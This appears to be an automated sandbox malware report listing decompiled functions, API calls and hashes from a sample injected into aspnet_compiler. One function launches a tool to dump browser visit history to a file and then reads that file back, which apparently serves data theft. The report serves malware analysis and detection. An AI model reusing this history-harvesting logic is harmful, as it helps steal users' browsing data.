                    0x00000000
                    0x004423be
                    0x004423c4
                    0x004423d0
                    0x00000000
                    0x004423d2
                    0x004423d2
                    0x004423d3
                    0x004423d4
                    0x004423da
                    0x004423df
                    0x004423e2
                    0x00000000
                    0x004423e2
                    0x004423d0
                    0x004423bc
                    0x004423eb
                    0x004423ee
                    0x00000000
                    0x004423ee
                    0x004423e9
                    0x00000000
                    0x0044238f
                    0x00442393
                    0x00442393
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                    • Instruction ID: ffef20b579aa455cdcb3ec38d6af2d4eff98cb77a0cb65f0443bbc9c4ef6001c
                    • Opcode Fuzzy Hash: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                    • Instruction Fuzzy Hash: 5101D6B22096127FF6211E797CC1D2B232DEF513BA365033BF921512D5DAACCC444168
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409BE8 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E00409BE8(void* __ecx, char* __edx) {
				void* __ebx;
				int _t9;
				long _t14;
				char* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t9 =  *0x4730e8 |  *0x4730ec;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E00401EE4(0x4730a0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x4730ec;
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x4730e8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E0040A64F(0, _t24, _t22);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46f9d4 - 0x31;
						if( *0x46f9d4 == 0x31) {
							E004086D0(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E0040977E(_t24, _t22);
						}
					}
				}
				return _t9;
			}











                    0x00409be8
                    0x00409bed
                    0x00409bf6
                    0x00409bf8
                    0x00409c00
                    0x00409c03
                    0x00409c1e
                    0x00409c24
                    0x00409c29
                    0x00409c69
                    0x00409c2b
                    0x00409c2d
                    0x00409c33
                    0x00409c39
                    0x00409c45
                    0x00409c4c
                    0x00409c50
                    0x00409c50
                    0x00409c5a
                    0x00409c5a
                    0x00409c61
                    0x00409c61
                    0x00409c6c
                    0x00409c75
                    0x00409c77
                    0x00409c7e
                    0x00409c89
                    0x00000000
                    0x00409c90
                    0x00409c7e
                    0x00409c75
                    0x00409c98

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                    • Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                    • CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID:
                    • API String ID: 1958988193-0
                    • Opcode ID: 5ad1ed3af5bed69a5ff6478d2e9d3a9c5653c6e737b1b91eeee8138e63c319b1
                    • Instruction ID: 776417b5dd6b277b78666ee6a0049f3b3f0777a2ef627118506dbb8d74d8395d
                    • Opcode Fuzzy Hash: 5ad1ed3af5bed69a5ff6478d2e9d3a9c5653c6e737b1b91eeee8138e63c319b1
                    • Instruction Fuzzy Hash: 2C11EB306487C07AF721AB34A8C9A2F3ADEA745705F04447FF187661D3C6799D84831D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00446DE6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00446DE6(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x470668 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x45cc40 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x54ba778f
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                    0x00446deb
                    0x00446def
                    0x00446df6
                    0x00446dfa
                    0x00446e08
                    0x00446e1e
                    0x00446e22
                    0x00446e4b
                    0x00446e4d
                    0x00446e51
                    0x00446e54
                    0x00446e54
                    0x00446e5a
                    0x00446e5c
                    0x00000000
                    0x00446e5d
                    0x00446e24
                    0x00446e2d
                    0x00446e3c
                    0x00446e2f
                    0x00446e32
                    0x00446e38
                    0x00446e38
                    0x00446e40
                    0x00000000
                    0x00446e42
                    0x00446e45
                    0x00446e47
                    0x00000000
                    0x00446e47
                    0x00446e40
                    0x00446dfc
                    0x00446e01
                    0x00000000

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue), ref: 00446E18
                    • GetLastError.KERNEL32(?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000,00000364,?,00446B67), ref: 00446E24
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00446D8D,00000000,00000000,00000000,00000000,?,004470B9,00000006,FlsSetValue,0045D130,0045D138,00000000), ref: 00446E32
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                    • Instruction ID: 7cfac10879522bcf09d0363c87617103b1842d1ca64a55dff1d48b8732c2297d
                    • Opcode Fuzzy Hash: a5304e2d2fd2594c12811dfafb94f311b8e24b7740d385cabe09339be51067e1
                    • Instruction Fuzzy Hash: 7901F73A2063229BD7214B79EC44A573BD9AF06F62B320231F91AD7241D724D801C6ED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041ADFE Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041ADFE(void* __edx) {
				long _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				struct _OVERLAPPED* _t12;
				WCHAR* _t13;
				void* _t17;
				long _t19;
				void* _t21;

				_t12 = 0;
				_t21 = __edx;
				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t17 != 0xffffffff) {
					_t19 = GetFileSize(_t17, 0);
					E0040242E(0, _t21, _t17, _t21, _t19, 0);
					_v12 = 0;
					if(ReadFile(_t17, E00401F8B(_t21), _t19,  &_v12, 0) != 0) {
						_t12 = 1;
					}
					CloseHandle(_t17);
					return _t12;
				}
				return 0;
			}













                    0x0041ae02
                    0x0041ae04
                    0x0041ae1d
                    0x0041ae22
                    0x0041ae31
                    0x0041ae37
                    0x0041ae41
                    0x0041ae59
                    0x0041ae5b
                    0x0041ae5b
                    0x0041ae5e
                    0x00000000
                    0x0041ae64
                    0x00000000

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041AE2B
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041AE50
                    • CloseHandle.KERNEL32(00000000), ref: 0041AE5E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                    • Instruction ID: 3f0c34db4874b28da9e92ecf7e139d0848c3339cd4cea530d57336cc45ca2017
                    • Opcode Fuzzy Hash: 442c9d8ecbfc2981eb1d44de6e8e3768176206f0722ce75e894edeb3ed96a232
                    • Instruction Fuzzy Hash: 1BF0C2B52462087FE6111B21BC84FBF379CDB867A9F10067EFD02A22C1CA658D054536
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00438160 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 19%
                    			E00438160(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E004387AF(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00437C87(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E004389B1(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00437F6A(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00437C55(_t25, _t30);
					return _t25;
				}
				return _t25;
			}













                    0x00438160
                    0x00438160
                    0x00438163
                    0x00438168
                    0x0043816b
                    0x0043816d
                    0x00438170
                    0x00438173
                    0x00438174
                    0x00438177
                    0x0043817c
                    0x0043817c
                    0x0043817f
                    0x00438183
                    0x00438186
                    0x0043818b
                    0x00438188
                    0x00438188
                    0x00438188
                    0x0043818e
                    0x00438194
                    0x00438197
                    0x00438199
                    0x0043819c
                    0x0043819f
                    0x004381a0
                    0x004381a9
                    0x004381ae
                    0x004381b1
                    0x004381b7
                    0x004381ba
                    0x004381bd
                    0x004381c0
                    0x004381c1
                    0x004381c4
                    0x004381cf
                    0x004381d3
                    0x00000000
                    0x004381d3
                    0x004381da

                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00438177
                      • Part of subcall function 004387AF: ___AdjustPointer.LIBCMT ref: 004387F9
                    • _UnwindNestedFrames.LIBCMT ref: 0043818E
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004381A0
                    • CallCatchBlock.LIBVCRUNTIME ref: 004381C4
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                    • Instruction ID: b80c8dfee50a01e3efcc98067a7db4f6d443bb63a6d24abc5b8fd2fcc045c81f
                    • Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
                    • Instruction Fuzzy Hash: F1011732000209BBCF125F56CC01EEB7BBAFF4C714F14511AF95866220D73AE8629BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00417F42 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00417F42(intOrPtr _a4, intOrPtr _a8) {
				int _v4;
				void* __ecx;
				int _t9;
				void* _t13;
				int _t26;
				int _t29;

				_t9 = GetSystemMetrics(0x4c);
				_t26 = GetSystemMetrics(0x4d);
				_t29 = GetSystemMetrics(0x4e);
				_v4 = GetSystemMetrics(0x4f);
				if(_t9 < 0) {
					_a4 = _a4 + E00417482();
				}
				if(_t26 < 0) {
					_a8 = _a8 + E00417482();
				}
				_t13 = E00417FA9(_a4, _t29);
				E00417FA9(_a8, _v4);
				return _t13;
			}









                    0x00417f4f
                    0x00417f59
                    0x00417f5f
                    0x00417f63
                    0x00417f69
                    0x00417f72
                    0x00417f72
                    0x00417f78
                    0x00417f81
                    0x00417f81
                    0x00417f8b
                    0x00417f9a
                    0x00417fa8

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
                    • API String ID: 4116985748-0
                    • Opcode ID: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                    • Instruction ID: db9294b6453bfed66dbe03807c9cf0078fbbbbfeeb63ddf2ed7e0e7c3359cc27
                    • Opcode Fuzzy Hash: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                    • Instruction Fuzzy Hash: 85F0AFB1B483165FD700EFB69C45A6B7AE59BD42A4F10043FF608C7281EEACDC458B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00437801 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00437801() {
				void* _t4;
				void* _t8;

				E00438C10();
				E00437795();
				if(E00438D37() != 0) {
					_t4 = E00438CE9(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00438D73();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                    0x00437801
                    0x00437806
                    0x00437812
                    0x00437817
                    0x0043781c
                    0x0043781e
                    0x00437829
                    0x00437820
                    0x00437820
                    0x00000000
                    0x00437820
                    0x00437814
                    0x00437814
                    0x00437816
                    0x00437816

                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00437801
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00437806
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043780B
                      • Part of subcall function 00438D37: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00438D48
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00437820
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                    • Instruction ID: 44b38c586fa46ca64db38af4dc09b646a72d0231a99fa094af013a7d49b3c72a
                    • Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                    • Instruction Fuzzy Hash: 5DC00298409781141D383A7311461AE93002C6E3CDF8078DFFAE0175435D0E140B957E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044152D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004415BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                    • Instruction ID: 9bdf7c23e7d16313cb1f45f597b7cc27bb5148f7337d60067ed22a22280059c4
                    • Opcode Fuzzy Hash: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                    • Instruction Fuzzy Hash: C4514C61E06201A7F7517714C9813BB2B94DB80741F28896BF0D6823BAEB3DCCD59E4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00420387 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00420387(void* __ecx) {
				signed int _t92;
				signed int _t93;
				intOrPtr _t94;
				signed int _t95;
				signed int _t96;
				void* _t100;
				signed int _t124;
				signed int _t130;
				signed int _t134;
				void* _t142;
				signed int _t148;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				signed int _t169;
				signed int _t172;
				signed int _t174;
				signed int _t175;
				signed int* _t177;
				signed int* _t178;
				signed int* _t179;
				signed int* _t180;

				 *_t177 =  *_t177 & 0x00000000;
				_t142 = __ecx;
				_t92 =  *(__ecx + 0x310) & 0x0000ffff;
				if((_t92 & 0x00000004) == 0) {
					if((_t92 & 0x00001000) == 0) {
						goto L1;
					}
					_t94 =  *((intOrPtr*)(__ecx + 8));
					if(_t94 == 0) {
						L26:
						_t93 = 0xffffff53;
						L27:
						return _t93;
					}
					_t95 = _t94 + 0x54;
					_t177[6] = _t95;
					if(_t95 == 0) {
						goto L26;
					}
					_push( &(_t177[3]));
					_t96 = E0042035E(_t95, 0x20);
					_t169 = _t177[4];
					_t148 = 0xb;
					_t165 = _t96 % _t148;
					_t177[7] = _t165;
					if(_t169 == 0) {
						if(E00432AE1(0x474a44) == 0) {
							_t174 = 0;
							_t166 = _t165 * 0x170;
							_t177[5] = 0;
							_t16 = _t166 + 0x473990; // 0x473990
							_t99 = _t16;
							_t177[6] = _t16;
							while(1) {
								_t100 = E004358BA(_t177[9], _t99, 0x20);
								_t177 =  &(_t177[3]);
								if(_t100 == 0) {
									break;
								}
								_t174 = _t174 + 1;
								_t99 = _t177[6] + 0x78;
								_t177[5] = _t174;
								_t177[6] = _t177[6] + 0x78;
								if(_t174 < 3) {
									continue;
								}
								_t174 =  *(_t166 + 0x473980);
								_t177[5] = _t174;
								 *(_t166 + 0x473980) = _t174 + 1;
								break;
							}
							_t175 = _t174 * 0x78;
							_push(0x30);
							if( *(_t142 + 0x310) < 0x8000) {
								_push( *((intOrPtr*)(_t142 + 8)) + 0xa5);
								_t32 = _t166 + 0x4739b1; // 0x4739b1
								_push(_t32 + _t175);
								E004351E0();
								 *((char*)(_t166 + _t175 + 0x4739b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x74));
							} else {
								_push(_t142 + 0x199);
								_t28 = _t166 + 0x4739b1; // 0x4739b1
								_push(_t28 + _t175);
								E004351E0();
								 *((char*)(_t166 + _t175 + 0x4739b0)) = 0x20;
							}
							_t178 =  &(_t177[3]);
							_t37 = _t166 + 0x473990; // 0x473990
							E004351E0(_t37 + _t175, _t178[8], 0x20);
							_t179 =  &(_t178[3]);
							 *(_t166 + _t175 + 0x4739e2) =  *(_t142 + 0x314) >> 0x00000009 & 0x00000001;
							 *((intOrPtr*)(_t166 + _t175 + 0x47398c)) =  *((intOrPtr*)(_t142 + 0x20c));
							 *((intOrPtr*)(_t166 + _t175 + 0x473988)) = E0041D039(0x474a44);
							 *((char*)(_t166 + _t175 + 0x4739e4)) =  *((intOrPtr*)(_t142 + 0x317));
							 *((char*)(_t166 + _t175 + 0x4739e5)) =  *((intOrPtr*)(_t142 + 0x318));
							 *((short*)(_t166 + _t175 + 0x4739fc)) =  *((intOrPtr*)(_t142 + 0x1e4));
							 *((intOrPtr*)(_t166 + 0x473984)) =  *((intOrPtr*)(_t166 + 0x473984)) + 1;
							if( *(_t166 + 0x473980) == 3) {
								 *(_t166 + 0x473980) =  *(_t166 + 0x473980) & 0x00000000;
							}
							if(( *(_t142 + 0x310) & 0x00000030) != 0x10) {
								L25:
								 *(_t166 + _t175 + 0x4739e6) = 0;
								goto L24;
							} else {
								_t124 =  *(_t142 + 0x1ce) & 0x0000ffff;
								if(_t124 == 0) {
									goto L25;
								}
								 *(_t166 + _t175 + 0x4739e6) = _t124;
								_t67 = _t166 + 0x4739e8; // 0x4739e8
								E004351E0(_t67 + _t175, _t142 + 0x1d0,  *(_t142 + 0x1ce) & 0x0000ffff);
								_t130 = E0042035E(_t142 + 0x1d0,  &(_t179[7]));
								_t169 = _t179[8];
								_t180 =  &(_t179[4]);
								_t153 = 0xb;
								_t162 = _t130 % _t153;
								if(_t169 == 0) {
									_t172 = _t162 * 0x14;
									_t154 =  *(_t172 + 0x474950);
									 *(_t172 + 0x474950) = _t154 + 1;
									_t134 = _t162 * 5 + _t154;
									 *((short*)(0x474958 + _t134 * 4)) = _t180[8];
									 *((short*)(0x47495a + _t134 * 4)) = _t180[5];
									 *((intOrPtr*)(_t172 + 0x474954)) =  *((intOrPtr*)(_t172 + 0x474954)) + 1;
									if( *(_t172 + 0x474950) == 3) {
										 *(_t172 + 0x474950) =  *(_t172 + 0x474950) & 0x00000000;
									}
									_t169 = _t180[4];
								}
								L24:
								E00432AEB(0x474a44);
								_t151 = 0xffffff96;
								_t170 =  !=  ? _t151 : _t169;
								_t93 =  !=  ? _t151 : _t169;
								goto L27;
							}
						}
						_t93 = 0xffffff96;
						goto L27;
					}
					_t93 = _t169;
					goto L27;
				}
				L1:
				_t93 = 0;
				goto L27;
			}




























                    0x0042038a
                    0x0042038f
                    0x00420393
                    0x0042039c
                    0x004203aa
                    0x00000000
                    0x00000000
                    0x004203ac
                    0x004203b1
                    0x0042060d
                    0x0042060d
                    0x00420612
                    0x00420618
                    0x00420618
                    0x004203b7
                    0x004203ba
                    0x004203be
                    0x00000000
                    0x00000000
                    0x004203c8
                    0x004203ce
                    0x004203d8
                    0x004203dc
                    0x004203df
                    0x004203e1
                    0x004203e7
                    0x004203fc
                    0x00420407
                    0x00420409
                    0x0042040f
                    0x00420413
                    0x00420413
                    0x00420419
                    0x0042041d
                    0x00420424
                    0x00420429
                    0x0042042e
                    0x00000000
                    0x00000000
                    0x00420434
                    0x00420435
                    0x00420438
                    0x0042043c
                    0x00420443
                    0x00000000
                    0x00000000
                    0x00420445
                    0x0042044b
                    0x00420452
                    0x00000000
                    0x00420452
                    0x0042045d
                    0x00420460
                    0x00420469
                    0x00420492
                    0x00420493
                    0x0042049b
                    0x0042049c
                    0x004204a7
                    0x0042046b
                    0x00420471
                    0x00420472
                    0x0042047a
                    0x0042047b
                    0x00420480
                    0x00420480
                    0x004204ae
                    0x004204b1
                    0x004204c0
                    0x004204cc
                    0x004204d7
                    0x004204e5
                    0x004204f1
                    0x004204fe
                    0x0042050b
                    0x00420519
                    0x00420521
                    0x0042052e
                    0x00420530
                    0x00420530
                    0x00420541
                    0x00420601
                    0x00420603
                    0x00000000
                    0x00420547
                    0x00420547
                    0x00420551
                    0x00000000
                    0x00000000
                    0x00420557
                    0x0042056d
                    0x00420577
                    0x0042058a
                    0x0042058f
                    0x00420593
                    0x0042059a
                    0x0042059b
                    0x0042059f
                    0x004205a1
                    0x004205a4
                    0x004205ad
                    0x004205b6
                    0x004205bc
                    0x004205c8
                    0x004205d0
                    0x004205dd
                    0x004205df
                    0x004205df
                    0x004205e6
                    0x004205e6
                    0x004205ea
                    0x004205ef
                    0x004205f8
                    0x004205f9
                    0x004205fc
                    0x00000000
                    0x004205fe
                    0x00420541
                    0x00420400
                    0x00000000
                    0x00420400
                    0x004203e9
                    0x00000000
                    0x004203e9
                    0x0042039e
                    0x0042039e
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: DJG$DJG
                    • API String ID: 0-3553971598
                    • Opcode ID: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                    • Instruction ID: f2201e53aae1a578f399186880d4f81f94f4690d310475270f371cf99ab1fffa
                    • Opcode Fuzzy Hash: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                    • Instruction Fuzzy Hash: 8861F0F16046569BC704DF28D8017A6F7E4FF84304F04052EED9C8B346E778AA64DBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E0040402C(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				void* __ebp;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;
				void* _t86;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020BF(__ebx,  &_v52);
				E0040CEEC( &_v28, 0x30, E00401F8B(E0041A4D3( &_v76)));
				E00401FB8();
				E00401F8B(0x472e18);
				E00417456(E00401EE4(E00402FF4(_t48,  &_v100, E004042FD(_t48,  &_v124, E004042DC(_t48,  &_v148,  &_v692, _t85, 0, E0040415E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t84 = 0;
				while(1) {
					E00401EE4( &_v28);
					_t80 =  &_v52;
					if(E0041ADFE( &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					E00401EE9();
					E00401FB8();
					return _t81;
				}
				E004020D6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00404A81(0x472d98, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

















                    0x0040402c
                    0x00404043
                    0x00404046
                    0x0040404f
                    0x00404069
                    0x00404072
                    0x0040407c
                    0x004040d0
                    0x004040d8
                    0x004040e0
                    0x004040eb
                    0x004040f6
                    0x004040fb
                    0x004040fd
                    0x00404100
                    0x00404105
                    0x00404111
                    0x00000000
                    0x00000000
                    0x00404118
                    0x0040411e
                    0x00404122
                    0x00000000
                    0x00000000
                    0x00404124
                    0x00404146
                    0x00404149
                    0x00404151
                    0x0040415d
                    0x0040415d
                    0x0040412f
                    0x00404134
                    0x0040413e
                    0x00404145
                    0x00404145
                    0x00000000

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
